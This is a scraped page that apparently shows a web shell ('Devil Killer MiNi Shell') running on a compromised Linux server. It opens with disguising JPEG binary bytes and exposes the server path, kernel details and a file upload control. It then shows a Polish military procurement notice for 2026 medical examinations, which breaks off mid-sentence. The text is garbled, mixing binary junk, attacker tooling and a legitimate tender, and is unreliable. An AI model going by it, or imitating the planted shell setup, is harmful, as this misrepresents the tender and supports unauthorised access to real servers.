JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251121/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251121/0054961401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa wykonania badań wstępnych, okresowych, kontrolnych i konsultacji lekarskich na rok 2026. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">10 Brygada Logistyczna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 532213882</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. ks. Bolesława Domańskiego 68</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-820</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">10blog.zampubliczne@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.10blog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka Wojskowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa wykonania badań wstępnych, okresowych, kontrolnych i konsultacji lekarskich na rok 2026. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6842acef-b633-47cb-86c1-9dadbf411d2e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00549614</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00130882/23/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Usługa wykonania badań wstępnych, okresowych, kontrolnych i konsultacji lekarskich na rok 2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/10blog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/10blog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">a.	Postępowanie prowadzone jest w języku polskim, przy użyciu środków komunikacji elektronicznej, na platformie zakupowej, dalej platforma, pod adresem: platformazakupowa.pl/pn/10blog. Platforma zapewnia integralność, autentyczność, nienaruszalność i poufność przesyłanych plików i informacji.<br/>b.	Zamawiający udostępnia wykonawcy dokumenty w zakładce „Załączniki do postępowania”.<br/>c.	Wiadomości od zamawiającego wyświetlają się w zakładce „Komunikaty”. Wykonawca ma obowiązek sprawdzać wiadomości od zamawiającego bezpośrednio na platformie, gdyż system powiadomień może ulec awarii lub powiadomienia mogą trafić do folderu Spam. Wykonawca kontaktuje się z zamawiającym w zakładce „Komunikaty”, klikając w przycisk „Wyślij wiadomość do zamawiającego”.<br/>d.	Zamawiający dopuszcza komunikację ustną jedynie w sytuacjach wyjątkowych np. podczas awarii platformy i tylko w zakresie informacji nieistotnych. Zamawiający nie przewiduje użycia innych środków komunikacji ze względu na sytuacje, o których mowa w art. 65 ust. 1, art. 66 i art. 69 uPZP.<br/>e.	Wykonawca składa ofertę w zakładce Formularz, klikając w przycisk „Dołącz Plik”. Wykonawca ma obowiązek złożyć dokumenty jawne w odpowiednio oznaczonym i wydzielonym pliku dla dokumentów jawnych, a dokumenty niejawne w odpowiednio oznaczonym i wydzielonym pliku dla dokumentów niejawnych.<br/>f.	Na wykonawcy spoczywa obowiązek wykazania, że przekazane zamawiającemu informacje niejawne stanowią tajemnicę przedsiębiorstwa, w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, w przeciwnym razie zamawiający ma możliwości ich odtajnienia.<br/>g.	Zamawiający nie ponosi odpowiedzialności za złożenie oferty przez wykonawcę w sposób niezgodny z instrukcją, np. gdy wykonawca złoży ofertę poprzez zakładkę „Komunikaty”. Oferta złożona w ten sposób zostanie odrzucona ponieważ nie został spełniony obowiązek wynikający z art. 221 uPZP.<br/>h.	Wykonawca przystępując do postępowania akceptuje „Regulamin” platformy i ma obowiązek zapoznać się i postępować zgodnie z „Instrukcją dla Wykonawców”, która znajduje się na platformie.<br/>i.	Aby korzystać z platformy wykonawca powinien posiadać: stały dostęp do sieci Internet o przepustowości nie mniejszej niż 512 kb/s; komputer PC lub MAC o pamięci min. 2 GB Ram; procesor Intel IV 2 GHZ; systemem operacyjnym Windows 7, Mac Os x 10 4, Linux lub ich nowszą wersję; zainstalowaną inną niż Internet Explorer przeglądarkę internetową; włączoną obsługę JavaScript; zainstalowany program Adobe Acrobat Reader lub inny, obsługujący format pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ochrona danych osobowych<br/>a.	Zgodnie z obowiązkiem informacyjnym, o którym mowa w art. 13 ust. 1-3 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych), zwane dalej RODO, zamawiający informuje, że:<br/>	Administratorem Pani/Pana danych osobowych jest 10 Brygada Logistyczna w Opolu, a Inspektorem Danych Osobowych Grzegorz Skoczka: g.skoczka@ron.mil.pl.<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem.<br/>	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 uPZP.<br/>	Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 uPZP przez okres 4 lat od dnia zakończenia postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach uPZP, związanym z udziałem w postępowaniu.<br/>	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>	Posiada Pani/Pan:<br/>	prawo dostępu do danych osobowych Pani/Pana dotyczących (art. 15 RODO). W przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania;<br/>	prawo do sprostowania Pani/Pana danych osobowych (art. 16 RODO). Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania, ani zmianą postanowień umowy w zakresie niezgodnym z uPZP, oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>	prawo żądania od administratora ograniczenia przetwarzania danych osobowych (art. 18 RODO) z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>	Nie przysługuje Pani/Panu:<br/>	prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO i prawo do przenoszenia danych, o którym mowa w art. 20 RODO;<br/>	prawo sprzeciwu wobec przetwarzania danych osobowych, na podstawie art. 21 RODO, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/ZDR/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 363162,60 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie badań medycyny pracy dla żołnierzy i pracowników RON na rok 2026 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 336487,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85147000-1 - Usługi zdrowotne świadczone dla firm</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Prawo opcji<br/>a.	Zamawiający przewiduje prawo opcji na wszystkie części zamówienia. Ofertę, pod groźbą jej odrzucenia, należy złożyć zarówno na zamówienie podstawowe jak i opcjonalne.<br/>b.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nie skorzystanie z prawa opcji lub skorzystanie tylko z jej części, nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>c.	Szczegóły związane z realizacją prawa opcji znajdują się w Projektowanych postanowieniach umowy – załącznik nr 1 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.	Najkorzystniejszą będzie oferta, która przedstawia najkorzystniejszy bilans ceny (kosztu) sumy zamówienia podstawowego i opcjonalnego.<br/>b.	Kryterium oceny ofert jest<br/>	C/ cena, waga 100 %, maksymalna liczba punktów 100, obliczona wg wzoru:<br/>	C = (koszt najniższej ceny oferty brutto/koszt ceny badanej oferty brutto) X 100 %<br/>c.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą liczbę punktów, zaokrąglonych do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie badań widzenia zmierzchowego oraz wrażliwości na olśnienie kierowców z wydaniem zaświadczenia potwierdzającego możliwość pracy na danym stanowisku </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 18495,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85147000-1 - Usługi zdrowotne świadczone dla firm</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a.	Zamawiający przewiduje prawo opcji na wszystkie części zamówienia. Ofertę, pod groźbą jej odrzucenia, należy złożyć zarówno na zamówienie podstawowe jak i opcjonalne.<br/>b.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nie skorzystanie z prawa opcji lub skorzystanie tylko z jej części, nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>c.	Szczegóły związane z realizacją prawa opcji znajdują się w Projektowanych postanowieniach umowy – załącznik nr 1 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.	Najkorzystniejszą będzie oferta, która przedstawia najkorzystniejszy bilans ceny (kosztu) sumy zamówienia podstawowego i opcjonalnego.<br/>b.	Kryterium oceny ofert jest<br/>	C/ cena, waga 100 %, maksymalna liczba punktów 100, obliczona wg wzoru:<br/>	C = (koszt najniższej ceny oferty brutto/koszt ceny badanej oferty brutto) X 100 %<br/>c.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą liczbę punktów, zaokrąglonych do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie badań lekarskich z wydaniem orzeczenia i badań psychologicznych dla pracowników ochrony fizycznej </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 8180,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85147000-1 - Usługi zdrowotne świadczone dla firm</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> a.	Zamawiający przewiduje prawo opcji na wszystkie części zamówienia. Ofertę, pod groźbą jej odrzucenia, należy złożyć zarówno na zamówienie podstawowe jak i opcjonalne.<br/>b.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nie skorzystanie z prawa opcji lub skorzystanie tylko z jej części, nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>c.	Szczegóły związane z realizacją prawa opcji znajdują się w Projektowanych postanowieniach umowy – załącznik nr 1 do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.	Najkorzystniejszą będzie oferta, która przedstawia najkorzystniejszy bilans ceny (kosztu) sumy zamówienia podstawowego i opcjonalnego.<br/>b.	Kryterium oceny ofert jest<br/>	C/ cena, waga 100 %, maksymalna liczba punktów 100, obliczona wg wzoru:<br/>	C = (koszt najniższej ceny oferty brutto/koszt ceny badanej oferty brutto) X 100 %<br/>c.	Za najkorzystniejszą zostanie uznana oferta, która otrzyma największą liczbę punktów, zaokrąglonych do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga, aby wykonawca spełniał dodatkowe warunki udziału w postepowaniu, tj.:<br/>	posiadał zdolność występowania w obrocie gospodarczym (art. 113 uPZP), zamawiający nie stawia warunków w tym zakresie.<br/>	posiadał uprawnienia do prowadzenia działalności (art. 114 uPZP), i na potwierdzenie złożył: <br/>Dla części nr 1:<br/>	Wpis do rejestru podmiotów wykonujących działalność leczniczą, o której mowa w ustawie z dnia 15 kwietnia 2011 r. o działalności leczniczej (tekst jednolity Dz. U. z 2024 r., poz. 799 ze zm.) <br/>	Posiada przewidziane prawem uprawnienia do wykonywania na obszarze Rzeczypospolitej Polskiej działalności leczniczej w rozumieniu przepisów ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (tekst jednolity Dz. U. z 2024 r., poz. 799 ze zm.),<br/>	Posiada gabinety, w których będą wykonywane usługi medyczne, obiekt oraz urządzenia i sprzęt medyczny wykorzystywane do przeprowadzania badań spełniają standardy określone w Rozporządzeniu Ministra Zdrowia z dnia 26 marca 2019 r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. z 2019 r. poz. 595 ze zm.) oraz w ustawie z dnia 15 kwietnia 2011 r. o działalności leczniczej (tekst jednolity Dz. U. z 2024 r., poz. 799 ze zm.)<br/> i na potwierdzenie złoży „Oświadczenie wykonawcy dotyczące potwierdzenia posiadania uprawnień” - załącznik nr 8.1 do SWZ<br/>Dla części nr 2:<br/>	Posiada wpis do rejestru przedsiębiorców prowadzących pracownię psychologiczną prowadzonego przez marszałka województwa opolskiego w myśl obowiązujących przepisów<br/>	Posiada przewidziane prawem uprawnienia do wykonywania zwodu psychologa <br/>	Posiada gabinety, w których będą wykonywane badania, odpowiednie urządzenia do przeprowadzania badań oraz wykwalifikowany personel.<br/>i na potwierdzenie złoży „Oświadczenie wykonawcy dotyczące potwierdzenia posiadania uprawnień” - załącznik nr 8.2 do SWZ<br/>Dla części nr 3:<br/>	Wpis do rejestru 